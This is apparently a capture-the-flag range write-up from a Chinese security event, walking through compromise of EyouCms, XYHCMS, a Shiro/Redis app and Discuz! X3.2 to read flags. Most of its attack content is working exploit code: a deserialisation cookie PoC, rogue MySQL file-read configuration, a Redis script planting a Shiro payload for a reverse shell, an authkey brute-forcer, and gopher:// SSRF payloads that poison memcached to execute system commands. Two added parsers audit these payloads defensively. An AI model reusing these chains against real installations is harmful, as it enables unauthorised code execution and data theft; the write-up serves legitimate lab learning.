Preface
First of all, thanks to Master Yue (月师傅) for organising the Mid-Autumn Festival event; the range was very well built and great fun. His blog: 渗透测试培训-网络安全培训-暗月博客 (moonsec.com). Thanks as well for the mooncakes he sent.
Walkthrough
I started with a goby port scan of 103.108.67.223 (nmap was too slow).
FLAG1
http://103.108.67.223:8880/
At the bottom of the site:
Copyright © 2012-2018 某某公司 版权所有 Powered by EyouCms
EyouCms
File scan
Tried public n-day exploits
Tried quite a few vulnerabilities
and finally followed Eyoucms V1.5.X漏洞分析 - 徐野子 - 博客园 (cnblogs.com) (an analysis of Eyoucms V1.5.X vulnerabilities)
Brute-forced the token with a Go script; for some reason the Python brute-forcer never found it
Got a shell through the admin backend, but with very limited privileges: phpinfo showed a disable_functions restriction, and for some reason the AntSword bypass plugin wouldn't get past it…
Releases · TarlogicSecurity/Chankro (github.com)
Tried bypassing via LD_PRELOAD, but it didn't work
Ended up using .antproxy.php
moonsec_flag{2f0460e434a10e8912cOef6f630add2c
FLAG2
http://103.108.67.223:8866/
Copyright © 2014-2020 XYHCMS. 行云海软件 版权所有 Power by XYHCMS
XYHCMS
Directory scan
There is an install directory?? Not sure whether its files were deleted. Searched for n-days.
The first result:
痛失CVE之xyhcms(thinkphp3.2.3)反序列化 - FreeBuf网络安全行业门户 (an XYHCMS / ThinkPHP 3.2.3 deserialisation write-up)
The directory /App/Runtime/Data/config/ does not exist, but /App/Runtime/Data/ is accessible
http://103.108.67.223:8866/App/Runtime/Data/d51694dcb61d76bef156076835ffd7e7_config/site.php
Found the key: TlRAcBF8e
Then run the PoC and swap its output in for the nickname
```php
<?php
namespace Think\Db\Driver;
use PDO;
class Mysql {
    protected $options = array(
        PDO::MYSQL_ATTR_LOCAL_INFILE => true
    );
    protected $config = array(
        "dsn"      => "mysql:host=localhost;dbname=xyhcms;port=3306",
        "username" => "root",
        "password" => "root"
    );
}

namespace Think;
class Model {
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct() {
        $this->db = new \Think\Db\Driver\Mysql();
        $this->options['where'] = '';
        $this->pk = 'luoke';
        $this->data[$this->pk] = array(
            "table" => "xyh_admin_log",
            "where" => "id=0"
        );
    }
}

namespace Think\Session\Driver;
class Memcache {
    protected $handle;
    public function __construct() {
        $this->handle = new \Think\Model();
    }
}

namespace Think\Image\Driver;
class Imagick {
    private $img;
    public function __construct() {
        $this->img = new \Think\Session\Driver\Memcache();
    }
}

namespace Common\Lib;
class SysCrypt {
    private $crypt_key;
    public function __construct($crypt_key) {
        $this->crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp, $this->crypt_key));
    }
    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt), $this->crypt_key);
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }
    private function __key($txt, $encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }
    public function __destruct() {
        $this->crypt_key = null;
    }
}

function get_cookie($name, $key = '') {
    $key = '7q6Gw97sh';
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
}

function set_cookie($args, $key = '') {
    $key = 'TlRAcBF8e';   // the key found in site.php
    $value = serialize($args);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
}

$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b, '');
echo str_replace('+', '%2B', $a);
```
With the PoC from the article, statement execution succeeded.
Then I also found the article xyhcms getshell_qq_42307546的博客-CSDN博客 (an XYHCMS getshell write-up),
but we can just use Gifts/Rogue-MySql-Server: Rogue MySql Server (github.com) and go straight for the flag
```python
# Only the configuration head of the Rogue-MySql-Server script (Python 2, asyncore/asynchat)
# is shown here; filelist is pointed at the file to pull back via LOAD DATA LOCAL INFILE.
import socket
import asyncore
import asynchat
import struct
import random
import logging
import logging.handlers

PORT = 3306

log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(tmp_format)

filelist = (
    r'/flag',
)

__author__ = 'Gifts'
```
Which gave:
moonsec_flag{f54d2bdb1f8c6a7996b0a0bf373997fd}
FLAG3
http://103.108.67.223:8089/
Shiro + Redis
I've done similar CTF challenges before.
Brute-forced the Redis password and got abc123
I think one of Master Yue's earlier articles covered this Shiro + Redis problem
Reference: redis未授权到shiro反序列化 - 先知社区 (aliyun.com) (unauthenticated Redis to Shiro deserialisation)
You can also use the following directly (cokeBeer's version didn't work for me)
```python
import pyyso
import socket

s = socket.socket()
s.connect(("127.0.0.1", 6379))
whatever = b"123"
key = b"shiro:session:" + whatever
# "反弹shell命令" is a placeholder for the reverse shell command; it has to be wrapped
# as bash -c {...} and encoded (see the article linked below)
value = pyyso.cb1v192("反弹shell命令")
# Raw RESP: *3 \r\n $3 \r\n SET \r\n $<len> \r\n key \r\n $<len> \r\n value \r\n
s.send(b"\x2a\x33\x0d\x0a\x24\x33\x0d\x0aSET\r\n\x24" + str(len(key)).encode() + b"\r\n" + key
       + b"\r\n\x24" + str(len(value)).encode() + b"\r\n" + value + b"\r\n")
if b"+OK" in s.recv(3):
    print("success")
```
https://mp.weixin.qq.com/s/QvyVU6HXmxlfdkLwrH9vTw (Master Yue's earlier assessment write-up also mentions this)
Capture the request and modify the JSESSIONID; the reverse shell came back and I read the flag (if the shell doesn't connect back, retry a few times, or after writing the key use the standard Shiro approach)
moonsec_flag{327a6c4304ad5938eaf0efb6cc3e53dc}
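As an added example (not code from the write-up or from any of the linked tools), the following decodes the raw RESP SET framing that the script above hand-builds and applies the check a defender could run over a Redis key dump or a traffic capture: a value under shiro:session: that is not a Java-serialised Shiro session was not written by the application. The sample frames are constructed, and the SimpleSession class name is assumed to be what shiro-redis stores by default.

```python
# Added example: parse the RESP "SET" framing the script above builds by hand, and flag
# writes under shiro:session: whose value is not a Java-serialised Shiro session.
JAVA_MAGIC = b"\xac\xed\x00\x05"                     # Java ObjectOutputStream stream header
SHIRO_SESSION_CLASS = b"org.apache.shiro.session.mgt.SimpleSession"   # assumed session class

def resp_set(key: bytes, value: bytes) -> bytes:
    """Frame a SET the way the write-up's script does: *3, then three bulk strings."""
    return b"*3\r\n$3\r\nSET\r\n$%d\r\n%s\r\n$%d\r\n%s\r\n" % (len(key), key, len(value), value)

def parse_resp(data: bytes):
    """Decode one RESP array of bulk strings into a list of byte strings."""
    if not data.startswith(b"*"):
        raise ValueError("not a RESP array")
    head, rest = data.split(b"\r\n", 1)
    items = []
    for _ in range(int(head[1:])):
        if not rest.startswith(b"$"):
            raise ValueError("expected a bulk string")
        length_line, rest = rest.split(b"\r\n", 1)
        n = int(length_line[1:])
        if rest[n:n + 2] != b"\r\n":
            raise ValueError("bulk string length does not match its payload")
        items.append(rest[:n])
        rest = rest[n + 2:]
    return items

def inspect_shiro_set(data: bytes) -> str:
    """'ignore' for unrelated commands, 'ok' for a plausible session record, else 'suspicious'."""
    cmd = parse_resp(data)
    if len(cmd) != 3 or cmd[0].upper() != b"SET" or not cmd[1].startswith(b"shiro:session:"):
        return "ignore"
    value = cmd[2]
    # shiro-redis stores Java-serialised SimpleSession objects; a value under this prefix
    # that is something else was planted by a client other than the application.
    if value.startswith(JAVA_MAGIC) and SHIRO_SESSION_CLASS in value[:64]:
        return "ok"
    return "suspicious"

# Constructed samples: a plausible session record and a foreign serialised object.
LEGIT = resp_set(b"shiro:session:abc", JAVA_MAGIC + b"sr\x00\x2a" + SHIRO_SESSION_CLASS + b"\x00" * 8)
FOREIGN = resp_set(b"shiro:session:123", JAVA_MAGIC + b"sr\x00\x10some.other.Class" + b"\x00" * 8)
```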
FLAG4
http://103.108.67.223:8822/forum.php
Powered by Discuz! X3.2
Spent more than a day on this with nothing to show; then saw in Master Yue's group chat that everything was public.
Browsed the files under http://103.108.67.223:8822/install/
In http://103.108.67.223:8822/install/data/ there is a database dump containing
('authkey','9f50c9zryqZt5FYA');
authkey?? Searched for related material
Reference articles:
Discuz 搜索结果 - 像黑客一样学习 (hacking8.com)
VulWiki/Web安全/Discuz/Discuz! X < 3.4 authkey 算法的安全性漏洞.md at master · Ares-X/VulWiki (github.com)
DiscuzX3.3 authkey可爆破漏洞复现 - darkless
Checked other sites via FOFA and found that sstr differs from site to site; the cookie prefix is known, so remember to change it.
Mainly followed Discuz!-X-_-3.4-authkey-算法的安全性漏洞 - Discuz (hacking8.com) (on the weakness of the Discuz! X < 3.4 authkey algorithm)
```python
# coding=utf-8
# Build the argument list for php_mt_seed: four numbers per mt_rand() output
# (min max range_min range_max). The first w_len outputs (the authkey's random
# part) are unknown and get the full range; the sstr characters are known outputs.
w_len = 10
result = ""
str_list = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"
length = len(str_list)
for i in range(w_len):
    result += "0 "
    result += str(length - 1)
    result += " "
    result += "0 "
    result += str(length - 1)
    result += " "
sstr = "t2xl"
for i in sstr:
    result += str(str_list.index(i))
    result += " "
    result += str(str_list.index(i))
    result += " "
    result += "0 "
    result += str(length - 1)
    result += " "
print(result)
```
Took the resulting arguments and ran them through the php_mt_seed script
https://github.com/ianxtianxt/php-mt_rand
Then, from the seeds it reports, regenerate the random strings
```php
<?php
// Discuz's random(): built on mt_rand, so its output is reproducible from the seed.
function random($length) {
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    PHP_VERSION < '4.2.0' && mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

// result.txt holds php_mt_seed's output; each "seed = N" line is replayed to
// regenerate the 10-character random part of the authkey into result2.txt.
$fp = fopen('result.txt', 'rb');
$fp2 = fopen('result2.txt', 'wb');
while (!feof($fp)) {
    $b = fgets($fp, 4096);
    if (preg_match("/seed = (\d)+/", $b, $match)) {
        $m = $match[0];
    } else {
        continue;
    }
    mt_srand((int)substr($m, 7));
    fwrite($fp2, random(10) . "\n");
}
fclose($fp);
fclose($fp2);
```
Also note: the arguments for https://www.openwall.com/php_mt_seed/ have to be generated first, since they are what populates "result".
Finally, use:
```python
# coding=utf-8
import itertools
import hashlib
import time

def dsign(authkey):
    # Signature of the getpasswd link: first 16 hex chars of md5(url + authkey)
    url = "url"            # target base URL
    idstring = "vnY6nW"
    uid = 2
    uurl = "{}member.php?mod=getpasswd&uid={}&id={}".format(url, uid, idstring)
    url_md5 = hashlib.md5((uurl + authkey).encode())
    return url_md5.hexdigest()[:16]

def main():
    sign = "af3b937d0132a06b"
    str_list = "0123456789abcdef"
    with open('result2.txt') as f:
        ranlist = [s[:-1] for s in f]
    s_list = sorted(set(ranlist), key=ranlist.index)   # de-duplicate, keep order
    r_list = itertools.product(str_list, repeat=6)      # the 6 unknown hex characters
    print("[!] start running....")
    s_time = time.time()
    for j in r_list:
        for s in s_list:
            prefix = "".join(j)
            authkey = prefix + s
            if dsign(authkey) == sign:
                print("[*] found used time: " + str(time.time() - s_time))
                return "[*] authkey found: " + authkey

if __name__ == "__main__":
    found = main()
    if found:
        print(found)
```
Later I found http://103.108.67.223:8822/config/config_global.php.bak
which leaks configuration!??
```php
// -------------------------- CONFIG MEMORY --------------------------- //
$_config['memory']['prefix'] = 'Wzj0Ps_';
$_config['memory']['redis']['server'] = '';
$_config['memory']['redis']['port'] = 6379;
$_config['memory']['redis']['pconnect'] = 1;
$_config['memory']['redis']['timeout'] = '0';
$_config['memory']['redis']['requirepass'] = '';
$_config['memory']['redis']['serializer'] = 1;
$_config['memory']['memcache']['server'] = '127.0.0.1';
$_config['memory']['memcache']['port'] = 11211;
$_config['memory']['memcache']['pconnect'] = 1;
$_config['memory']['memcache']['timeout'] = 1;
$_config['memory']['apc'] = 1;
$_config['memory']['xcache'] = 1;
$_config['memory']['eaccelerator'] = 1;
$_config['memory']['wincache'] = 1;
```
Also dug up a few articles:
Discuz!-X-authkeyMemcachessrf-getshell - Discuz (hacking8.com)
Discuz!-X3.4-Memcached未授权访问导致的rce - Discuz (hacking8.com)
PoC:
```
http://103.148.244.120:8822/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://www.oosec.cn/poc.php?a.jpg[/img]
```
Host this payload on a server and make the target fetch it:
```php
<?php
header("Location: gopher://localhost:11211/_set%20Wzj0Ps_setting%201%200%20162%0d%0aa%3A2%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A2%3A%7Bs%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7Ds%3A7%3A%22replace%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A9%3A%22cat%20/flag%22%3B%7D%7D%7Ds%3A13%3A%22rewritestatus%22%3Bi%3A1%3B%7D");
?>
```
The first time it wasn't parsed; I had missed this line in the article:
```php
$payload['output']['preg']['search']['plugins'] = "/.*/e";
```
/.*/e
Finally used:
```php
<?php
header("Location: gopher://localhost:11211/_set%20Wzj0Ps_setting%201%200%20173%0D%0Aa%3A2%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A2%3A%7Bs%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7Ds%3A7%3A%22replace%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A19%3A%22system('cat%20%2Fflag')%22%3B%7D%7D%7Ds%3A13%3A%22rewritestatus%22%3Bi%3A1%3B%7D");
?>
```
Got the flag: moonsec_flag{ae5cbc768cb85f87e83e8fe75fbcd1eb}
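As an added example (not the write-up's code), a small auditor for the gopher:// payloads above: it splits the memcached set command, checks the declared byte count against the body, and walks the PHP-serialised settings array to flag a preg search pattern with the /e modifier, which is what turns a cached setting into code execution. The sample URL is constructed, with a harmless body of the same shape as the payloads.

```python
# Added example: decode a gopher:// memcached "set" like the ones above, compare the
# declared byte count with the body, and walk the PHP-serialised settings array to
# flag a preg search pattern that carries the /e modifier.
from urllib.parse import unquote_to_bytes

def parse_gopher_memcache(url: str):
    """Return (key, declared_length, body) from gopher://host:11211/_set ... \\r\\n<data>."""
    raw = unquote_to_bytes(url.split("/_", 1)[1])      # "_" selector: raw bytes follow
    header, body = raw.split(b"\r\n", 1)
    cmd, key, _flags, _exptime, nbytes = header.split()[:5]
    if cmd != b"set":
        raise ValueError("not a memcached set command")
    return key.decode(), int(nbytes), body.rstrip(b"\r\n")

def php_unserialize(buf: bytes, pos: int = 0):
    """Minimal PHP unserialize for the i:, s: and a: types the settings payload uses."""
    t = chr(buf[pos])
    if t == "i":
        end = buf.index(b";", pos)
        return int(buf[pos + 2:end]), end + 1
    colon = buf.index(b":", pos + 2)
    n = int(buf[pos + 2:colon])                          # string length or element count
    if t == "s":
        start = colon + 2                                # skip ':"'
        return buf[start:start + n].decode(), start + n + 2   # skip '";'
    if t == "a":
        pos, out = colon + 2, {}                         # skip ':{'
        for _ in range(n):
            k, pos = php_unserialize(buf, pos)
            out[k], pos = php_unserialize(buf, pos)
        return out, pos + 1                              # skip '}'
    raise ValueError("unsupported type %r" % t)

def audit_setting(url: str):
    """Findings for one cache-poisoning URL: declared-length mismatch and any /e regex."""
    key, declared, body = parse_gopher_memcache(url)
    findings = []
    if declared != len(body):
        findings.append("declared %d bytes, body is %d" % (declared, len(body)))
    setting, _ = php_unserialize(body)
    for name, pat in setting.get("output", {}).get("preg", {}).get("search", {}).items():
        if "e" in pat.rsplit("/", 1)[-1]:             # modifiers sit after the last '/'
            findings.append("preg search %r uses the /e modifier: %s" % (name, pat))
    return key, findings

# Constructed sample with the same nesting as the payloads above (87-byte body).
SAMPLE = ("gopher://localhost:11211/_set%20Wzj0Ps_setting%201%200%2087%0d%0a"
          "a%3A1%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A1%3A%7B"
          "s%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7D%7D%7D%7D")
```

Run on the two payloads above, it reports the /e pattern in both and that the first declares 162 bytes for a body that is 163 bytes long, while the second's 173 matches its body.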